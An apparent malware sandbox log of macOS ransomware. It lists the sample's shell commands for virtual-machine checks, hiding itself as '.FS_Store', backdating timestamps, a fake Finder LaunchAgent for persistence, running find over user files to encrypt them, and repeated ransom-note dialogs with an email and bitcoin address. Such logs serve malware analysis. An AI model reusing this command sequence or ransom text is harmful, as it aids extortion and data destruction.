Source: /bin/sh (PID: 865)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Executes commands using a shell command-line interpreterShow sources
Source: /Users/vreni/Desktop/macRansom (PID: 686)Shell command executed: sh -c sysctl hw.model|grep Mac > /dev/null
Source: /Users/vreni/Desktop/macRansom (PID: 686)Shell command executed: sh -c echo $((`sysctl -n hw.logicalcpu`/`sysctl -n hw.physicalcpu`))|grep 2 > /dev/null
Source: /Users/vreni/Desktop/macRansom (PID: 686)Shell command executed: sh -c mv '/Users/vreni/Desktop/macRansom' '/var/root/Library/.FS_Store'
Source: /Users/vreni/Desktop/macRansom (PID: 686)Shell command executed: sh -c touch -ct 201606071012 '/var/root/Library/.FS_Store'
Source: /Users/vreni/Desktop/macRansom (PID: 686)Shell command executed: sh -c touch -ct 201606071012 '/var/root/Library/LaunchAgents/com.apple.finder.plist'
Source: /Users/vreni/Desktop/macRansom (PID: 686)Shell command executed: sh -c launchctl remove com.apple.finder
Source: /Users/vreni/Desktop/macRansom (PID: 686)Shell command executed: sh -c launchctl load /var/root/Library/LaunchAgents/com.apple.finder.plist
Source: /usr/bin/bash (PID: 702)Shell command executed: bash -c ! pgrep -x .FS_Store && ~/Library/.FS_Store
Source: /var/root/Library/.FS_Store (PID: 704)Shell command executed: sh -c sysctl hw.model|grep Mac > /dev/null
Source: /var/root/Library/.FS_Store (PID: 704)Shell command executed: sh -c echo $((`sysctl -n hw.logicalcpu`/`sysctl -n hw.physicalcpu`))|grep 2 > /dev/null
Source: /var/root/Library/.FS_Store (PID: 704)Shell command executed: sh -c find /Volumes ~ ! -path '/var/root/Library/.FS_Store' -type f -size +8c -user `whoami` -perm -u=r -exec '/var/root/Library/.FS_Store' {} +
Source: /var/root/Library/.FS_Store (PID: 704)Shell command executed: sh -c touch -ct 201606071012 '/var/root/Library/LaunchAgents/com.apple.finder.plist'
Source: /var/root/Library/.FS_Store (PID: 704)Shell command executed: sh -c touch -ct 201606071012 '/var/root/Library/.FS_Store'
Source: /var/root/Library/.FS_Store (PID: 704)Shell command executed: sh -c killall Finder
Source: /var/root/Library/.FS_Store (PID: 718)Shell command executed: sh -c sysctl hw.model|grep Mac > /dev/null
Source: /var/root/Library/.FS_Store (PID: 718)Shell command executed: sh -c echo $((`sysctl -n hw.logicalcpu`/`sysctl -n hw.physicalcpu`))|grep 2 > /dev/null
Source: /var/root/Library/.FS_Store (PID: 734)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__0
Source: /var/root/Library/.FS_Store (PID: 734)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 738)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__1
Source: /var/root/Library/.FS_Store (PID: 738)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 741)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__2
Source: /var/root/Library/.FS_Store (PID: 741)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 745)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__3
Source: /var/root/Library/.FS_Store (PID: 745)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 748)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__4
Source: /var/root/Library/.FS_Store (PID: 748)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 751)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__5
Source: /var/root/Library/.FS_Store (PID: 751)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 754)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__6
Source: /var/root/Library/.FS_Store (PID: 754)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 757)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__7
Source: /var/root/Library/.FS_Store (PID: 757)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 760)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__8
Source: /var/root/Library/.FS_Store (PID: 760)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 763)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__9
Source: /var/root/Library/.FS_Store (PID: 763)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 766)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__10
Source: /var/root/Library/.FS_Store (PID: 766)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 769)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__11
Source: /var/root/Library/.FS_Store (PID: 769)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 772)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__12
Source: /var/root/Library/.FS_Store (PID: 772)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 775)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__13
Source: /var/root/Library/.FS_Store (PID: 775)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 778)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__14
Source: /var/root/Library/.FS_Store (PID: 778)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 782)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__15
Source: /var/root/Library/.FS_Store (PID: 782)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 785)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__16
